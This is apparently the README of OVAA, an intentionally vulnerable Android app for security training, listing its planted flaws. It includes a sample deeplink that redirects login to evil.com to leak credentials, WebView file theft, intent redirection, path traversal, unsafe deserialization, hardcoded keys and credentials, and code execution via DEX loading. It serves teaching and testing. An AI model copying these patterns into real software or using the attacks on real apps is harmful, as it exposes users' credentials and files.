Awesome
Description
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
List of vulnerabilities
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
- Installation of an arbitrary
login_url
via deeplinkoversecured://ovaa/login?url=http://evil.com/
. Leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute
android:grantUriPermissions="true"
) via deeplinkoversecured://ovaa/grant_uri_permissions
. The attacker's app needs to processoversecured.ovaa.action.GRANT_PERMISSIONS
and pass intent tosetResult(code, intent)
with flags such asIntent.FLAG_GRANT_READ_URI_PERMISSION
and the URI of the content provider. - Vulnerable host validation when processing deeplink
oversecured://ovaa/webview?url=...
. - Opening arbitrary URLs via deeplink
oversecured://ovaa/webview?url=http://evilexample.com
. An attacker can use the vulnerable WebView settingWebSettings.setAllowFileAccessFromFileURLs(true)
in theWebViewActivity.java
file to steal arbitrary files by sending them XHR requests and obtaining their content. - Access to arbitrary activities and acquiring access to arbitrary content providers in
LoginActivity
by supplying an arbitrary Intent object toredirect_intent
. - Theft of arbitrary files in
MainActivity
by intercepting an activity launch fromIntent.ACTION_PICK
and passing the URI to any file as data. - Insecure broadcast to
MainActivity
containing credentials. The attacker can register a broadcast receiver with actionoversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA
and obtain the user's data. - Insecure activity launch in
MainActivity
with actionoversecured.ovaa.action.WEBVIEW
, containing the user's encrypted data in the query parametertoken
. - Deletion of arbitrary files via the insecure
DeleteFilesSerializable
deserialization object. - Memory corruption via the
MemoryCorruptionParcelable
object. - Memory corruption via the
MemoryCorruptionSerializable
object. - Obtaining read/write access to arbitrary files in
TheftOverwriteProvider
via path-traversal in the valueuri.getLastPathSegment()
. - Obtaining access to app logs via
InsecureLoggerService
. Leak of credentials inLoginActivity
Log.d("ovaa", "Processing " + loginData)
. - Use of the hardcoded AES key in
WeakCrypto
. - Arbitrary Code Execution in
OversecuredApplication
by launching code from third-party apps with no security checks. - Use of very wide file sharing declaration for
oversecured.ovaa.fileprovider
content provider inroot
entry. - Hardcoded credentials to a dev environment endpoint in
strings.xml
intest_url
entry. - Arbitrary code execution via a DEX library located in a world-readable/writable directory.
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc